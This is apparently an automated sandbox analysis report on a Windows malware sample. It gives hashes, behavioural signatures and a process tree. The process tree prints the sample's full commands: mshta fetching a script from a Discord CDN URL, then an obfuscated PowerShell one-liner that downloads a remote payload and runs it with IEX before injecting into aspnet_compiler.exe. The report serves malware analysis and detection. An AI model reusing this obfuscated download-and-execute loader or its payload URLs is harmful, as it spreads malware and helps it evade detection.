Analysis
-
max time kernel
64s -
max time network
127s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
21-07-2021 20:45
Static task
static1
Behavioral task
behavioral1
Sample
e27318b5d518aedb83accec2767fa87d.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
e27318b5d518aedb83accec2767fa87d.exe
Resource
win10v20210408
General
-
Target
e27318b5d518aedb83accec2767fa87d.exe
-
Size
326KB
-
MD5
e27318b5d518aedb83accec2767fa87d
-
SHA1
b66e7afa9b5c6bf8fa0634f0490b25c5cfd9d20e
-
SHA256
e15a30747a6b21794d76525b32ee3c32521bb917839ae3b2519f4e174cfe107f
-
SHA512
90c0bc18234036b9e802bf2aefdff646e866ad4313f8d9b063c7a5c9d4b4031f4824e5d535964295411216b12e6efc169ffc11ebaa7cdcb97d181a66fc57cbaa
Malware Config
Extracted
https://cdn.discordapp.com/attachments/862345240970264589/867428387840983060/langwige.txt
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
mshta.exepowershell.exeflow pid process 9 2108 mshta.exe 11 2108 mshta.exe 13 2108 mshta.exe 16 632 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 632 set thread context of 1184 632 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 632 powershell.exe 632 powershell.exe 632 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 632 powershell.exe Token: SeDebugPrivilege 1184 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
e27318b5d518aedb83accec2767fa87d.exemshta.exepowershell.exedescription pid process target process PID 908 wrote to memory of 2108 908 e27318b5d518aedb83accec2767fa87d.exe mshta.exe PID 908 wrote to memory of 2108 908 e27318b5d518aedb83accec2767fa87d.exe mshta.exe PID 2108 wrote to memory of 632 2108 mshta.exe powershell.exe PID 2108 wrote to memory of 632 2108 mshta.exe powershell.exe PID 632 wrote to memory of 1184 632 powershell.exe aspnet_compiler.exe PID 632 wrote to memory of 1184 632 powershell.exe aspnet_compiler.exe PID 632 wrote to memory of 1184 632 powershell.exe aspnet_compiler.exe PID 632 wrote to memory of 1184 632 powershell.exe aspnet_compiler.exe PID 632 wrote to memory of 1184 632 powershell.exe aspnet_compiler.exe PID 632 wrote to memory of 1184 632 powershell.exe aspnet_compiler.exe PID 632 wrote to memory of 1184 632 powershell.exe aspnet_compiler.exe PID 632 wrote to memory of 1184 632 powershell.exe aspnet_compiler.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e27318b5d518aedb83accec2767fa87d.exe"C:\Users\Admin\AppData\Local\Temp\e27318b5d518aedb83accec2767fa87d.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://cdn.discordapp.com/attachments/862345240970264589/867428528105848832/uninstall.txt2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://cdn.discordapp.com/attachments/862345240970264589/867428387840983060/langwige.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:632 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1184
-
-
-